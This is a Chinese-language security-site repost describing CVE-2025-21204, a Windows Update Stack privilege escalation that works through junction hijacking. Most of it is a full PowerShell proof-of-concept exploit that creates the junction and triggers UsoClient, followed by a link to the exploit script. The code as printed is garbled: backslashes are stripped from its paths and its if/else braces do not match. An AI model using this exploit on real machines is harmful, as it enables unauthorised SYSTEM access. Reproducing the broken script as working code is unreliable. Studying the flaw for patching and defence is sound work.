CVE-2025-21204:通过 Windows 更新堆栈中的不当链接跟踪进行权限提升

admin
admin
admin
140349
文章
117
评论
2025年4月19日00:22:03评论44 views字数 4922阅读16分24秒阅读模式
CVE-2025-21204:通过 Windows 更新堆栈中的不当链接跟踪进行权限提升

网址

  • https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/

目标

使用 2025 年 4 月更新之前的更新堆栈的 Windows

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204/

解释

CVE-2025-21204 是 Windows 更新堆栈中的一个本地权限提升漏洞,当具有 SYSTEM 权限的进程(例如)执行更新时会发生该漏洞MoUsoCoreWorker.exeUsoClient.exe在更新过程中,C:ProgramDataMicrosoftUpdateStackTasks路径中的脚本或二进制文件由具有 SYSTEM 权限的进程执行。此时,如果文件夹的权限设置不正确,攻击者可以删除该文件夹,并将其替换为与payload所在文件夹的连接,从而通过以下过程实现权限提升。

  1. 将有效负载(例如 PowerShell 脚本)放置在攻击者可以控制的路径上。

  2. C:ProgramDataMicrosoftUpdateStackTasks删除并替换为连接到在 1 中生成有效载荷的路径的连接点。

  3. 通过计划任务或直接触发更新来创建诸如 、UsoClient.exe、MoUsoCoreWorker.exe等流程。TiWorker.exe

  4. 当生成的进程执行有效载荷时,就会发生权限提升。

下面是用 PowerShell 编写的PoC,演示了此行为,创建具有系统权限的文件并从而提升权限。

<#.SYNOPSIS    CVE-2025-21204 exploit simulation for non-admin users via junction-based path hijack..DESCRIPTION    Drops a bait payload in a user-controlled directory, creates a junction to hijack the Update Stack path,    and triggers the update process to testif SYSTEM accesses the payload.    The script provide the poc that allows to run this actions. .AUTHOR    Elli Shlomo#># Paths$trapPath      = "$env:APPDATAMicrosoftUpdateStackTasks"$updateStackRealPath = "C:ProgramDataMicrosoftUpdateStackTasks"$payloadPath   = "$trapPathUpdateStackAgent.dll"$proofPath     = "C:UsersPubliccve2025-proof.log"$logPath       = "$env:APPDATACVE2025simulation.log"$evidencePath  = "$env:APPDATACVE2025evidence.txt"$verdictPath   = "$env:APPDATACVE2025vulnerable.txt"$verboseLog    = "$env:TEMPcve2025-verbose.log"# IntroWrite-Host "`n[*] CVE-2025-21204 Exploit Simulation (Non-Admin)"Write-Host "[*] Trap directory : $trapPath"Write-Host "[*] Payload DLL path : $payloadPath"Write-Host "[*] SYSTEM proof file : $proofPath"Write-Host "[*] Simulation log : $logPath"Write-Host "[*] Evidence file : $evidencePath"Write-Host "[*] Verdict result : $verdictPath"Write-Host "[*] Verbose transcript : $verboseLog`n"# Start transcriptStart-Transcript -Path $verboseLog -Force# Ensure directories existWrite-Host "[*] Creating necessary directories..."New-Item -Path $trapPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-NullNew-Item -Path (Split-Path $logPath) -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-NullWrite-Host "[+] Directories ready.`n"# Payload content$payload = @"Payload executed by SYSTEM at: $(Get-Date)"@# Write bait payloadWrite-Host "[*] Writing payload to: $payloadPath"$payload | Out-File -FilePath $payloadPath -Encoding ASCII$payload | Out-File -FilePath $proofPath -AppendWrite-Host "[+] Payload written.`n"# Simulation metadata log$log = @"CVE-2025-21204 Exploit Simulation-------------------------------------Date : $(Get-Date)Payload File : $payloadPathHijack Path : $updateStackRealPathProof File : $proofPath"@Set-Content -Path $logPath -Value $log -Encoding UTF8 -ForceWrite-Host "[+] Simulation metadata saved.`n"# Attempt junction creation (non-admin safe)Write-Host "[*] Attempting junction (no admin)..."if (-not (Test-Path $updateStackRealPath)) {    try {$cmd = "cmd.exe /c mklink /J `"$updateStackRealPath`" `"$trapPath`""        Start-Process -FilePath "cmd.exe" -ArgumentList "/c mklink /J `"$updateStackRealPath`" `"$trapPath`"" -NoNewWindow -Wait        Write-Host "[+] Junction created: $updateStackRealPath → $trapPath"    } catch {        Write-Host "[-] Failed to create junction: $_"    }else {    Write-Host "[!] Target path already exists: $updateStackRealPath"    Write-Host "[-] Cannot create junction unless folder is removed by SYSTEM update cleanup."}Write-Host ""# Trigger updateWrite-Host "[*] Triggering UsoClient.exe (StartScan)..."try {    Start-Process UsoClient.exe -ArgumentList StartScan -WindowStyle Hidden    Write-Host "[+] UsoClient.exe started.`n"} catch {    Write-Host "[-] Failed to trigger UsoClient.exe: $_"}# Monitor for SYSTEM processWrite-Host "[*] Monitoring for SYSTEM process MoUsoCoreWorker.exe..."$found = $falsefor ($i = 1; $i -le 6; $i++) {    Start-Sleep -Seconds 5    Write-Host "[=] Attempt ${i}: Checking..."if (Get-Process -Name "MoUsoCoreWorker" -ErrorAction SilentlyContinue) {        Write-Host "[!] SYSTEM process detected: MoUsoCoreWorker.exe"$found = $truebreak    }}Start-Sleep -Seconds 5# Check for successWrite-Host "`n[*] Analyzing payload execution..."if (Test-Path $proofPath) {$owner = (Get-Acl $proofPath).Owner$timestamp = (Get-Item $proofPath).LastWriteTime$details = @"[+] Exploit successfulPayload executed as: $ownerLast Modified: $timestamp"@    Set-Content -Path $verdictPath -Value $true    Write-Host "[✓] SUCCESS: SYSTEM likely accessed the payload."else {$details = @"[!] Exploit failedNo proof file found.Time: $(Get-Date)"@    Set-Content -Path $verdictPath -Value $false    Write-Host "[✗] FAILURE: Payload was not executed by SYSTEM."}# Save evidenceSet-Content -Path $evidencePath -Value $details -Encoding UTF8Write-Host "[*] Forensic evidence saved: $evidencePath"# EndStop-TranscriptWrite-Host "`n[✓] Simulation complete. See verbose log: $verboseLog`n"

在修补此漏洞的 2025 年 4 月更新中,作为针对此类攻击的缓解措施,C:inetpub 应用了默认 ACL 来预先创建可用于攻击的文件夹,使其无法用于链接跟踪攻击。

poc
https://raw.githubusercontent.com/eshlomo1/CloudSec/refs/heads/main/Attacking%20the%20Cloud/CVE-2025-21204/Exploit-CVE2025-UpdateStackLPE-NonAdmin.ps1

原文始发于微信公众号(Ots安全):CVE-2025-21204:通过 Windows 更新堆栈中的不当链接跟踪进行权限提升

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月19日00:22:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2025-21204:通过 Windows 更新堆栈中的不当链接跟踪进行权限提升https://cn-sec.com/archives/3976422.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息